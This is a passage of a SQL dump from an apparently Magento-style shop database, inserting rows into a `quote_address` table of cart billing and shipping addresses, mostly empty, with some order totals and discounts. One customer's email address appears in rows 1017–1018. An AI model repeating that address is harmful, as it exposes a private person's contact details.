(977, 672, '2026-03-27 18:21:20', '2026-03-27 18:21:20', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(978, 672, '2026-03-27 18:21:20', '2026-03-27 18:21:20', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(979, 673, '2026-03-27 18:21:23', '2026-03-27 18:21:23', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(980, 673, '2026-03-27 18:21:23', '2026-03-27 18:21:23', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(981, 674, '2026-03-27 18:21:26', '2026-03-27 18:21:26', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(982, 674, '2026-03-27 18:21:26', '2026-03-27 18:21:26', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(983, 675, '2026-03-27 18:21:30', '2026-03-27 18:21:30', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(984, 675, '2026-03-27 18:21:30', '2026-03-27 18:21:30', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(985, 676, '2026-03-27 18:21:33', '2026-03-27 18:21:33', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(986, 676, '2026-03-27 18:21:33', '2026-03-27 18:21:33', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(987, 677, '2026-03-27 18:21:35', '2026-03-27 18:21:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(988, 677, '2026-03-27 18:21:35', '2026-03-27 18:21:35', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(989, 678, '2026-03-27 18:21:37', '2026-03-27 18:21:37', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(990, 678, '2026-03-27 18:21:37', '2026-03-27 18:21:37', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(991, 679, '2026-03-27 18:21:39', '2026-03-27 18:21:39', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(992, 679, '2026-03-27 18:21:39', '2026-03-27 18:21:39', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(993, 680, '2026-03-27 18:42:28', '2026-03-27 18:42:28', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(994, 680, '2026-03-27 18:42:28', '2026-03-27 18:42:28', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(995, 681, '2026-03-27 20:11:34', '2026-03-27 20:11:34', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(996, 681, '2026-03-27 20:11:34', '2026-03-27 20:11:34', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(997, 682, '2026-03-27 21:25:01', '2026-03-27 21:25:01', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(998, 682, '2026-03-27 21:25:01', '2026-03-27 21:25:01', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(999, 683, '2026-03-27 21:39:58', '2026-03-27 21:39:58', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1000, 683, '2026-03-27 21:39:58', '2026-03-27 21:39:58', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1001, 684, '2026-03-27 21:40:06', '2026-03-27 21:40:06', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1002, 684, '2026-03-27 21:40:06', '2026-03-27 21:40:06', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1003, 685, '2026-03-27 21:40:38', '2026-03-27 21:40:38', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1004, 685, '2026-03-27 21:40:38', '2026-03-27 21:40:38', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1005, 686, '2026-03-27 21:41:05', '2026-03-27 21:41:05', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1006, 686, '2026-03-27 21:41:05', '2026-03-27 21:41:05', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1007, 687, '2026-03-27 21:41:32', '2026-03-27 21:41:32', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1008, 687, '2026-03-27 21:41:32', '2026-03-27 21:41:32', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1009, 688, '2026-03-28 00:56:58', '2026-03-28 00:56:58', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1010, 688, '2026-03-28 00:56:58', '2026-03-28 00:56:58', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1011, 689, '2026-03-28 01:12:17', '2026-03-28 01:12:17', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1012, 689, '2026-03-28 01:12:17', '2026-03-28 01:12:17', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1013, 690, '2026-03-28 01:46:17', '2026-03-28 01:46:17', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1014, 690, '2026-03-28 01:46:17', '2026-03-28 01:46:17', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1015, 691, '2026-03-28 06:26:36', '2026-03-28 06:26:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0);
INSERT INTO `quote_address` (`address_id`, `quote_id`, `created_at`, `updated_at`, `customer_id`, `save_in_address_book`, `customer_address_id`, `address_type`, `email`, `prefix`, `firstname`, `middlename`, `lastname`, `suffix`, `company`, `street`, `city`, `region`, `region_id`, `postcode`, `country_id`, `telephone`, `fax`, `same_as_billing`, `collect_shipping_rates`, `shipping_method`, `shipping_description`, `weight`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `tax_amount`, `base_tax_amount`, `shipping_amount`, `base_shipping_amount`, `shipping_tax_amount`, `base_shipping_tax_amount`, `discount_amount`, `base_discount_amount`, `grand_total`, `base_grand_total`, `customer_notes`, `applied_taxes`, `discount_description`, `shipping_discount_amount`, `base_shipping_discount_amount`, `subtotal_incl_tax`, `base_subtotal_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `shipping_incl_tax`, `base_shipping_incl_tax`, `vat_id`, `vat_is_valid`, `vat_request_id`, `vat_request_date`, `vat_request_success`, `validated_country_code`, `validated_vat_number`, `gift_message_id`, `free_shipping`) VALUES
(1016, 691, '2026-03-28 06:26:36', '2026-03-28 06:26:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1017, 692, '2026-03-28 09:04:06', '2026-03-28 09:04:06', 131, 0, NULL, 'billing', 'i.g.ut.e.liva8.2@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1018, 692, '2026-03-28 09:04:06', '2026-03-28 09:04:06', 131, 0, NULL, 'shipping', 'i.g.ut.e.liva8.2@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1019, 693, '2026-03-28 09:23:35', '2026-03-28 09:23:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1020, 693, '2026-03-28 09:23:35', '2026-03-28 09:23:35', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
